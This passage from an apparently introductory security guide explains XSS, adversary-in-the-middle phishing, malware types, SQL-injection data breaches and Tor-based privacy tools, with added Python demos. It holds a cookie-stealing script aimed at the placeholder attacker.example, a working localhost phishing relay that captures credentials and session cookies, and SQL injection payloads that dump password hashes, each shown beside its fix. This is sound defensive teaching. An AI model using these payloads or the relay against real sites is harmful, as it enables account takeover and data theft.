  • You checked the domain on every corner
  • You used a VPN
  • You didn’t give any input except for visiting the exact, authentic official Discord website

This is because the attacker used XSS. Simply said, XSS is getting your own script into a page that other people's browsers then run. Almost every website uses JavaScript, a programming language, to make the site function (when you press the login button, a script sends your credentials and shows you the logged-in page). But if the website doesn't properly sanitise what users submit, an attacker can get their own script onto the page, and your browser runs it with the same access as the site's own code.

Okay, so how did it happen in the scenario: the attacker commented on the official blog post with a normal-looking message like “Thank you, I almost got my password reset”, with the XSS script hidden inside it. Now, every time someone visits that page, the page loads all its contents, including the comments and thus also the injected script, and runs it.

I have to say this is rare on big sites, as such bugs get patched quickly and are hard to find. But it is possible. Two things limit the damage: cookies marked HttpOnly can't be read by scripts at all (though the script can still act on your behalf while you are on the page), and sites that use a Content Security Policy can refuse to run inline scripts in the first place.
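An added Python example (not from the original guide) of the bug behind this scenario: a page that pastes user comments straight into its HTML, next to the fixed version that escapes them. The comment text and the attacker.example domain are constructed.

```python
import html

# Constructed comment thread: two normal comments and one carrying a script.
# attacker.example is a placeholder, not a real host.
COMMENTS = [
    "Thanks, this fixed my login problem!",
    'Thank you, I almost got my password reset '
    '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>',
    "Great post <3",
]

PAGE = """<html><body><h1>How to secure your account</h1>
<ul>
{comments}
</ul></body></html>"""


def render_unsafe(comments) -> str:
    """Vulnerable: user text is pasted straight into the HTML, so a comment
    can add tags, including <script>, to everyone's copy of the page."""
    items = "\n".join(f"<li>{c}</li>" for c in comments)
    return PAGE.format(comments=items)


def render_safe(comments) -> str:
    """Fixed: every user-supplied string is escaped for the HTML text context,
    so '<' becomes '&lt;' and the browser shows the script instead of running it."""
    items = "\n".join(f"<li>{html.escape(c, quote=True)}</li>" for c in comments)
    return PAGE.format(comments=items)


def contains_script(page_html: str) -> bool:
    """Crude check a reviewer might run over rendered output."""
    return "<script" in page_html.lower()


def security_headers() -> dict:
    """Defence in depth, sent with the page: CSP refuses inline scripts even if
    one slips through, and HttpOnly keeps the session cookie out of document.cookie."""
    return {
        "Content-Security-Policy": "default-src 'self'; script-src 'self'",
        "Set-Cookie": "session=<token>; HttpOnly; Secure; SameSite=Lax",
    }


if __name__ == "__main__":
    print(render_unsafe(COMMENTS))
    print(render_safe(COMMENTS))
```

Escaping is context-specific: html.escape is right for text between tags, but a value dropped into a URL, a JavaScript string or an attribute without quotes needs a different encoder, which is why template engines that escape automatically are preferred over hand-built strings.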

AitM (Adversary in the Middle)

AitM is a man-in-the-middle attack combined with phishing.

AitM works with two connections instead of one: one between you and the attacker's server, and one between the attacker's server and the legitimate website you wanted to visit.

[You] ← Website connection 1 → [fakegoogle.com] ← Website connection 2 → [google.com]

So let's say you got baited onto a fake Google website. The attacker's server asks the real Google for the login page, receives it, and forwards it to you. When you enter your credentials, they first go to the attacker's server, which forwards them to Google. Maybe you enabled MFA, so Google replies with the MFA page, and the attacker forwards that to you as well. You fill in your code, it goes to the attacker's machine and then on to Google. Google then replies with your dashboard/home page, including your session cookie, which the attacker grabs before either redirecting you to the real Google or simply continuing to relay Google's pages. The MFA code did its job, and the attacker still walked away with a logged-in session.

Solution to this: passkeys, which are bound to the real domain and never produce a usable signature for the fake one. The one thing the attacker can't fake is the address bar, so always check the domain before logging in.
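The two-connection setup above as runnable code, added here and not part of the original guide: both “google.com” and “fakegoogle.com” are stand-in HTTP servers on 127.0.0.1, the cookie value and credentials are constructed, and the MFA step is left out for brevity (it would be relayed exactly like the password).

```python
import http.client
import threading
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
from urllib.parse import parse_qs

CAPTURED = []  # what the attacker walks away with


class RealSite(BaseHTTPRequestHandler):
    """Stands in for google.com: a login endpoint that hands out a session cookie."""

    def do_POST(self):
        body = self.rfile.read(int(self.headers.get("Content-Length", 0)))
        form = parse_qs(body.decode())
        if form.get("user") == ["alice"] and form.get("password") == ["correct horse"]:
            self.send_response(200)
            self.send_header("Set-Cookie", "SID=constructed-session-token; HttpOnly; Secure")
            self.send_header("Content-Type", "text/plain")
            self.end_headers()
            self.wfile.write(b"welcome alice")
        else:
            self.send_response(401)
            self.end_headers()
            self.wfile.write(b"bad login")

    def log_message(self, *args):  # keep the demo quiet
        pass


class PhishingProxy(BaseHTTPRequestHandler):
    """Stands in for fakegoogle.com: forwards every request to the real site and
    every response back, copying credentials and Set-Cookie as they pass."""

    upstream = None  # (host, port) of the real site, set by run_demo

    def do_POST(self):
        body = self.rfile.read(int(self.headers.get("Content-Length", 0)))
        CAPTURED.append(("credentials", body.decode()))           # connection 1
        conn = http.client.HTTPConnection(*self.upstream)       # connection 2
        conn.request("POST", self.path, body,
                     {"Content-Type": self.headers.get("Content-Type", "")})
        resp = conn.getresponse()
        data = resp.read()
        for name, value in resp.getheaders():
            if name.lower() == "set-cookie":
                CAPTURED.append(("cookie", value))                # the logged-in session
        self.send_response(resp.status)
        for name, value in resp.getheaders():
            if name.lower() in ("content-type", "set-cookie"):
                self.send_header(name, value)                      # victim gets the real cookie too
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)

    def log_message(self, *args):
        pass


def serve(handler):
    srv = ThreadingHTTPServer(("127.0.0.1", 0), handler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def run_demo():
    """The victim logs in through the phishing proxy. Returns ((status, body,
    cookie the victim received), everything the attacker captured)."""
    CAPTURED.clear()
    real = serve(RealSite)
    PhishingProxy.upstream = real.server_address
    fake = serve(PhishingProxy)
    try:
        conn = http.client.HTTPConnection(*fake.server_address)
        conn.request("POST", "/login", "user=alice&password=correct+horse",
                     {"Content-Type": "application/x-www-form-urlencoded"})
        resp = conn.getresponse()
        result = (resp.status, resp.read().decode(), resp.getheader("Set-Cookie"))
    finally:
        for srv in (fake, real):
            srv.shutdown()
            srv.server_close()
    return result, list(CAPTURED)


if __name__ == "__main__":
    victim_sees, attacker_got = run_demo()
    print("victim sees:", victim_sees)
    print("attacker got:", attacker_got)
```

The victim's side looks completely normal: a 200, the welcome page and a valid cookie. Nothing in the HTTP exchange distinguishes the relay from the real site; only the origin in the browser's address bar does, which is exactly what a passkey checks and a human under pressure doesn't.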

ZTA (Zero-Trust Architecture)

The Zero-Trust Architecture is a cybersecurity model based on one core idea:

Never trust anything by default — always verify.

That applies to everything: users, devices, applications, and network traffic, whether they’re inside or outside the network/group.

In general:

  • No implicit trust, even inside the network/group.
  • Every request is verified every time.
  • Access is limited to exactly what is needed.
    • Users and services get only the permissions they need.
    • Access is time-limited and task-specific.
    • Reduces damage if an account is compromised.
  • Breaches are assumed to happen.
    • Design systems as if attackers are already inside.
    • Segment systems to limit blast radius.
    • Continuous monitoring and logging.

Malware (Malicious Software)

There are various forms of malware; here are the most common ones:

Self-Propagating Malware

Malware that spreads automatically.

  • Virus: Attaches to legitimate files and spreads when executed.
  • Worm: Spreads over networks without user interaction.
  • Macro Virus: Spreads via documents (Word, Excel macros).

Stealth & Persistence Malware

Designed to hide or remain undetected.

  • Rootkit: Hides malware and provides privileged access.
  • Firmware Malware: Lives in BIOS/UEFI or hardware firmware.
  • Living-off-the-Land (LotL): Uses legitimate system tools maliciously.

Access & Control Malware

Used to gain or maintain control over systems.

  • Backdoor: Hidden access bypassing authentication.
  • RAT (Remote Access Trojan): Full remote control of a system.
  • Trojan: Disguised as legitimate software.
  • Loader / Dropper: Installs other malware.
  • Command-and-Control (C2) Agent: Communicates with attacker servers.

Data Theft & Surveillance Malware

Focused on spying and exfiltration.

  • Spyware: Monitors user activity.
  • Keylogger: Records keystrokes.
  • Screen Scraper: Captures screen data.
  • Credential Stealer: Steals passwords/tokens.
  • Infostealer: Broad data theft (cookies, wallets, files).

Financial Malware

Focused on monetisation.

  • Ransomware: Encrypts data for payment.
  • Crypto Miner (Cryptojacker): Uses system resources to mine crypto.
  • Adware: Forces ads or redirects (sometimes borderline malware).

Network Malware

Targets networks or services.

  • Botnet Agent: Turns a device into part of a botnet.
  • DDoS Malware: Launches denial-of-service attacks.
  • Packet Sniffer: Intercepts network traffic.
  • Man-in-the-Middle Malware: Alters communications.
  • Proxy Malware: Turns the device into a traffic relay.

There are various ways to detect malware. Some examples:

  • A hash/fingerprint of the file is compared against a large database of known malware hashes (signature-based detection).
  • Running it in a sandbox/virtual machine and observing what it does (dynamic analysis).
  • Detecting a pattern of unusual/malware-like behaviour on the system (heuristic or behavioural detection).
  • Uploading the file to VirusTotal, which runs it through many antivirus engines at once.
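An added Python example (not from the original guide) of the first and third methods side by side: an exact-hash signature next to a YARA-style string rule, and why the first breaks as soon as the attacker changes one byte. The “files” and rules are constructed; nothing here is real malware.

```python
import hashlib

# Constructed 'files'. Neither is real malware; they only stand in for samples.
SAMPLE_DROPPER = (b"MZ\x90\x00" + b"\x00" * 60
                  + b"constructed-dropper v1 CreateRemoteThread WriteProcessMemory")
REPACKED_DROPPER = SAMPLE_DROPPER.replace(b"v1", b"v2")      # attacker changes one byte
HARMLESS_FILE = b"MZ\x90\x00" + b"\x00" * 60 + b"hello world, nothing to see here"


def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


# Signature database: exact hashes of samples analysts have already seen.
KNOWN_BAD = {sha256(SAMPLE_DROPPER): "Constructed.Dropper.A"}


def hash_lookup(data: bytes):
    """Signature match: fast and exact, but any change to the file defeats it."""
    return KNOWN_BAD.get(sha256(data))


# Heuristic rules in the spirit of YARA: strings a dropper needs and a harmless
# program rarely contains. Every string in a rule must be present for it to fire.
RULES = {
    "Constructed.Dropper": [b"CreateRemoteThread", b"WriteProcessMemory"],
}


def rule_scan(data: bytes) -> list:
    """Content-based match: survives repacking as long as the tell-tale strings remain."""
    return [name for name, needles in RULES.items() if all(n in data for n in needles)]


def verdict(data: bytes) -> str:
    hit = hash_lookup(data)
    if hit:
        return f"known malware ({hit}, hash match)"
    hits = rule_scan(data)
    if hits:
        return f"suspicious ({', '.join(hits)}, rule match)"
    return "clean (no match; this is not proof of safety)"


def scan_file(path: str) -> str:
    with open(path, "rb") as f:
        return verdict(f.read())


if __name__ == "__main__":
    for label, blob in (("original", SAMPLE_DROPPER), ("repacked", REPACKED_DROPPER),
                        ("harmless", HARMLESS_FILE)):
        print(f"{label:9} {verdict(blob)}")
```

The hash misses the repacked copy while the rule still catches it; real engines combine both with sandboxing, because strings can be obfuscated just as easily as a byte can be flipped.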

Data Breaches

A data breach is when a company's database is compromised and its contents are copied out by an attacker. This can happen for various reasons; a common one is SQL injection.
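An added example (not from the original guide) of how a SQL injection turns one lookup into a full dump, using Python's built-in sqlite3 with constructed rows, beside the parameterised query that prevents it.

```python
import sqlite3


def build_db() -> sqlite3.Connection:
    """In-memory stand-in for a company's user table, filled with constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT, password_hash TEXT, last_ip TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (email, password_hash, last_ip) VALUES (?, ?, ?)",
        [("alice@example.com", "$2b$12$constructedhashA", "203.0.113.10"),
         ("bob@example.com", "$2b$12$constructedhashB", "203.0.113.11"),
         ("carol@example.com", "$2b$12$constructedhashC", "203.0.113.12")],
    )
    return conn


def find_user_vulnerable(conn, email: str) -> list:
    """Builds the SQL by string formatting: whatever the user typed becomes part
    of the query text, quotes and all."""
    query = f"SELECT email, last_ip FROM users WHERE email = '{email}'"
    return conn.execute(query).fetchall()


def find_user_safe(conn, email: str) -> list:
    """Parameterised query: the value travels separately from the SQL, so the
    database never parses it as code, no matter what it contains."""
    return conn.execute("SELECT email, last_ip FROM users WHERE email = ?", (email,)).fetchall()


# Two classic payloads typed into the e-mail field.
DUMP_ALL = "' OR '1'='1"                                        # every row
DUMP_HASHES = "' UNION SELECT email, password_hash FROM users --"  # another column entirely


if __name__ == "__main__":
    conn = build_db()
    for payload in (DUMP_ALL, DUMP_HASHES):
        print("vulnerable:", find_user_vulnerable(conn, payload))
        print("safe:      ", find_user_safe(conn, payload))
```

The second payload never asked for last_ip, yet the vulnerable query returns password hashes in its place: once the input is part of the SQL, the attacker picks the columns.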

Every piece of information you give to a company, via a website or whatever else, is stored in a database: your email, name, billing details, maybe a picture of your face or passport because you verified your age, your IP address, and so on.

In many countries, companies are also legally required to retain logs of your activities and IP addresses for a period of time. So, as you can probably tell already, such a database is really valuable to an attacker.

If you didn't know already, the world is constantly under cybersecurity threats, and it's not always a human at the keyboard; much of it is automated through botnets and servers. You can see a live map from Fortinet here.

They sell your data or post it on dark web forums. Other people who want to hack you consult these dumps and use them, for example by trying a leaked email/password pair on other sites (credential stuffing). That's why you should never reuse a password across accounts, and why you should change a password as soon as it shows up in a breach.

If you want to see whether your email address or password has been leaked, you can check it on Haveibeenpwned.
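An added Python example (not from the original guide) of how that password check works without sending your password anywhere: Have I Been Pwned's range API takes the first five characters of the password's SHA-1 hash and returns every leaked suffix sharing that prefix, so the match happens on your machine. The range text here is constructed; fetch_range does the real lookup if you want to run it online.

```python
import hashlib
import urllib.request

API = "https://api.pwnedpasswords.com/range/"   # the real HIBP endpoint


def split_hash(password: str) -> tuple:
    """SHA-1 the password and split it: only the 5-character prefix leaves your machine."""
    digest = hashlib.sha1(password.encode()).hexdigest().upper()
    return digest[:5], digest[5:]


def parse_range(text: str) -> dict:
    """The API answers with 'SUFFIX:COUNT' lines for every leaked hash sharing the prefix."""
    counts = {}
    for line in text.splitlines():
        suffix, _, count = line.strip().partition(":")
        if suffix and count.isdigit():
            counts[suffix] = int(count)
    return counts


def breach_count(password: str, range_text: str) -> int:
    """How many times this exact password appeared in known breaches (0 = not found)."""
    _, suffix = split_hash(password)
    return parse_range(range_text).get(suffix, 0)


def fetch_range(prefix: str) -> str:
    """Live lookup; needs network and is not called by the offline demo."""
    with urllib.request.urlopen(API + prefix, timeout=10) as resp:
        return resp.read().decode()


# Constructed range response shaped like the API's output for the prefix of
# 'password123': its real suffix with a made-up count, plus two filler lines.
_, _LEAKED_SUFFIX = split_hash("password123")
SAMPLE_RANGE = "\n".join([
    "0018A45C4D1DEF81644B54AB7F969B88D65:3",
    f"{_LEAKED_SUFFIX}:12345",
    "011053FD0102E94D6AE2F8B83D76FAF94F6:1",
])


if __name__ == "__main__":
    for pw in ("password123", "correct horse battery staple 9x!"):
        print(f"{pw!r}: seen {breach_count(pw, SAMPLE_RANGE)} times")
    # Online: prefix, _ = split_hash(pw); breach_count(pw, fetch_range(prefix))
```

Anything above zero means the password is in attackers' wordlists and will be tried in credential stuffing; replace it everywhere it was used, not just on the site that leaked.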

Hard / Expert

Advanced Topics

These tips are considered overkill if you are a normal user, but can also be useful if you want to go in-depth.

TOR (The Onion Router)

TOR is a network of volunteer-run servers (relays) that together form an anonymity network. The websites reachable only through it are what people call the dark web (not to be confused with the deep web, which just means pages that search engines don't index).

There is a browser you can download (Tor Browser) that routes your traffic through the TOR network. It also lets you access onion websites, which are websites hosted inside the network itself. A lot of criminal/dark web activity happens here, since it is heavily privacy focused. It is like a VPN but with three hops instead of one; it is also a lot slower.

Instead of 1 server, your traffic goes through 3 servers/nodes, normally in different countries. Your client wraps the traffic in three layers of encryption, and each node peels off one layer, which only tells it the next hop.

Circuit in a nutshell:

  • Entry / Guard node:
    • Sees: Your IP
    • Knows: you use TOR
    • Doesn’t see: Destination and content
  • Middle relay:
    • Sees: the IP of the guard node and of the exit node
    • Doesn’t see: your IP and destination/content
  • Exit node:
    • Sees: destination (youtube.com, for example)
    • Also sees: unencrypted data if the destination isn't HTTPS (and could modify it)
    • Doesn’t see: your IP (only the IP from the middle relay)

The website you visit thinks your IP is the one from the exit node.

Circuits are also rotated: new connections get a fresh circuit roughly every 10 minutes.

Tails (The Amnesic Incognito Live System)

Tails is an operating system that you install on a USB stick and boot from. Nothing you do on it is stored (unless you explicitly enable its Persistent Storage feature); everything runs in RAM. When you unplug the stick while it is running, or shut it down, the memory is wiped. All network communication is routed through TOR.

You can download it here.

Whonix + QubesOS

QubesOS is a security-focused operating system that makes use of virtualisation. Every application you run is isolated from the others in its own virtual machine (a “qube”).

Whonix, on the other hand, is also an operating system, but it is best installed inside QubesOS. Whonix consists of two virtual machines: a Gateway that routes everything through Tor, and a Workstation that you do your work on. The Workstation has no direct network access and never sees your real IP address. This is extra secure: to de-anonymise you, someone would need to reach you through Tor, hack the Workstation VM, escape that VM into QubesOS, and then compromise the Tor Gateway VM to disable the Tor routing.

But as the quote at the top of this guide says, everything is hackable. An attacker doesn't always have to take the hard way; he just needs to find the easy way.